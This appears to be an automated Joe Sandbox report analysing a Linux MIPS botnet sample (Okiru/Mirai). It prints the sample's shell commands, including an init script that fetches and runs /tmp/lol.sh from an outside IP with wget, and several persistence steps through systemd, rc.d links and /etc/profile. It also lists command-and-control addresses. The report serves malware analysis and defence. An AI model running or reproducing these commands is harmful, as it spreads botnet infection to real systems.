Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mipsel.nn.elf

Overview

General Information

Sample name:mipsel.nn.elf
Analysis ID:1580328
MD5:c07c769680b684bce01e72800bd11635
SHA1:ba5700e7489f5ae48ce165b58a43a68148978060
SHA256:799df6ce4695925d10cb52f413cceda3b9045d9dfa3039f8c7fed403f423d2ea
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1580328
Start date and time:2024-12-24 09:42:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mipsel.nn.elf
Detection:MAL
Classification:mal80.spre.troj.evad.linELF@0/10@0/0
Command:/tmp/mipsel.nn.elf
PID:6236
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Gorilla Botnet Cats Came After You!
Standard Error:
  • system is lnxubuntu20
  • mipsel.nn.elf (PID: 6236, Parent: 6163, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.nn.elf
    • sh (PID: 6251, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6264, Parent: 6251)
      • systemctl (PID: 6264, Parent: 6251, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6284, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6293, Parent: 6284)
      • chmod (PID: 6293, Parent: 6284, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6294, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6296, Parent: 6294)
      • ln (PID: 6296, Parent: 6294, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6297, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
    • sh (PID: 6299, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6301, Parent: 6299)
      • chmod (PID: 6301, Parent: 6299, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mipsel.nn.elf
    • sh (PID: 6302, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6306, Parent: 6302)
      • mkdir (PID: 6306, Parent: 6302, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6308, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6310, Parent: 6308)
      • ln (PID: 6310, Parent: 6308, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
  • udisksd New Fork (PID: 6248, Parent: 799)
  • dumpe2fs (PID: 6248, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6277, Parent: 6276)
  • snapd-env-generator (PID: 6277, Parent: 6276, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6323, Parent: 799)
  • dumpe2fs (PID: 6323, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6356, Parent: 799)
  • dumpe2fs (PID: 6356, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
SourceRuleDescriptionAuthorStrings
mipsel.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    SourceRuleDescriptionAuthorStrings
    6236.1.00007f3b2c400000.00007f3b2c41c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      Process Memory Space: mipsel.nn.elf PID: 6236JoeSecurity_OkiruYara detected OkiruJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: mipsel.nn.elfAvira: detected
        Source: mipsel.nn.elfReversingLabs: Detection: 39%
        Source: mipsel.nn.elfString: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s
        Source: global trafficTCP traffic: 192.168.2.23:60010 -> 94.156.227.234:38242
        Source: /tmp/mipsel.nn.elf (PID: 6236)Socket: 0.0.0.0:38242Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
        Source: mipsel.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofi
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal80.spre.troj.evad.linELF@0/10@0/0

        Persistence and Installation Behavior

        barindex
        Source: /tmp/mipsel.nn.elf (PID: 6236)File: /etc/profileJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6236)File: /etc/rc.localJump to behavior
        Source: /usr/bin/ln (PID: 6296)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
        Source: /usr/bin/ln (PID: 6310)File: /etc/rc.d/S99mipsel.nn.elf -> /etc/init.d/mipsel.nn.elfJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6236)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6293)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6301)File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6373/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6395/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6372/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6394/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6397/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6396/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6399/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6398/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6356/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6391/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6390/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6371/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6393/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6370/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6073/cmdlineJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6392/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/799/cmdlineJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6384/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6383/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6386/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6385/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6388/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6387/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6313)File opened: /proc/6389/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6251)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6284)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6294)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6297)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6299)Shell command executed: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6302)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6308)Shell command executed: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /bin/sh (PID: 6293)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
        Source: /bin/sh (PID: 6301)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mipsel.nn.elfJump to behavior
        Source: /bin/sh (PID: 6306)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
        Source: /bin/sh (PID: 6264)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6236)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6293)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6301)File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6236)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
        Source: /tmp/mipsel.nn.elf (PID: 6236)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
        Source: /bin/sh (PID: 6297)Writes shell script file to disk with an unusual file extension: /etc/init.d/mipsel.nn.elfJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/mipsel.nn.elf (PID: 6236)File: /etc/init.d/systemJump to dropped file
        Source: /bin/sh (PID: 6297)File: /etc/init.d/mipsel.nn.elfJump to dropped file
        Source: /tmp/mipsel.nn.elf (PID: 6236)Queries kernel information via 'uname': Jump to behavior
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt
        Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmpBinary or memory string: WkU/tmp/qemu-open.G1igFI\Ds
        Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmpBinary or memory string: /tmp/qemu-open.G1igFI
        Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: ZkU!/etc/qemu-binfmt/mipsel
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: /etc/qemu-binfmtP
        Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mipsel.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.nn.elf
        Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: ZkU/etc/qemu-binfmt
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: /etc/qemu-binfmtP /proc/3021/exeddressbooQ0
        Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmpBinary or memory string: ZkU!/usr/bin/vmtoolsd

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: mipsel.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6236.1.00007f3b2c400000.00007f3b2c41c000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: mipsel.nn.elf PID: 6236, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: mipsel.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6236.1.00007f3b2c400000.00007f3b2c41c000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: mipsel.nn.elf PID: 6236, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Unix Shell Configuration Modification
        1
        Unix Shell Configuration Modification
        1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Systemd Service
        1
        Systemd Service
        2
        File and Directory Permissions Modification
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt2
        Scripting
        Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580328 Sample: mipsel.nn.elf Startdate: 24/12/2024 Architecture: LINUX Score: 80 51 94.156.227.234, 38242, 60010, 60012 NETIXBG Bulgaria 2->51 53 109.202.202.202, 80 INIT7CH Switzerland 2->53 55 2 other IPs or domains 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected Okiru 2->61 8 mipsel.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 63 Sample tries to set files in /etc globally writable 8->63 65 Sample tries to persist itself using /etc/profile 8->65 67 Drops files in suspicious directories 8->67 69 Sample tries to persist itself using System V runlevels 8->69 18 mipsel.nn.elf sh 8->18         started        20 mipsel.nn.elf sh 8->20         started        22 mipsel.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/mipsel.nn.elf, POSIX 24->49 dropped 71 Drops files in suspicious directories 24->71 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 mipsel.nn.elf 24->41         started        signatures9 process10 signatures11 73 Sample tries to set files in /etc globally writable 28->73 75 Sample tries to persist itself using System V runlevels 31->75
        SourceDetectionScannerLabelLink
        mipsel.nn.elf39%ReversingLabsLinux.Backdoor.Mirai
        mipsel.nn.elf100%AviraEXP/ELF.Mirai.W
        SourceDetectionScannerLabelLink
        /etc/rc.local0%ReversingLabs
        /etc/rc.local0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/smipsel.nn.elffalse
          high
          http://94.156.227.233/mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            94.156.227.234
            unknownBulgaria
            57463NETIXBGfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
            94.156.227.234powerpc.nn.elfGet hashmaliciousOkiruBrowse
              sparc.nn.elfGet hashmaliciousOkiruBrowse
                arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                  arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                    mips.nn.elfGet hashmaliciousOkiruBrowse
                      arm5.nn.elfGet hashmaliciousOkiruBrowse
                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                          mips.nn.elfGet hashmaliciousOkiruBrowse
                            x86_64.nn.elfGet hashmaliciousOkiruBrowse
                              sh4.nn.elfGet hashmaliciousOkiruBrowse
                                91.189.91.43arm6.elfGet hashmaliciousUnknownBrowse
                                  hmips.elfGet hashmaliciousUnknownBrowse
                                    sparc.nn.elfGet hashmaliciousOkiruBrowse
                                      nsharm6.elfGet hashmaliciousUnknownBrowse
                                        arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                          mips.nn.elfGet hashmaliciousOkiruBrowse
                                            m68k.nn.elfGet hashmaliciousOkiruBrowse
                                              arm6.nn.elfGet hashmaliciousOkiruBrowse
                                                arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                  sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                    91.189.91.42arm6.elfGet hashmaliciousUnknownBrowse
                                                      hmips.elfGet hashmaliciousUnknownBrowse
                                                        sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                          nsharm6.elfGet hashmaliciousUnknownBrowse
                                                            arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                                              mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                m68k.nn.elfGet hashmaliciousOkiruBrowse
                                                                  arm6.nn.elfGet hashmaliciousOkiruBrowse
                                                                    arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                                      sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CANONICAL-ASGBarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        hmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
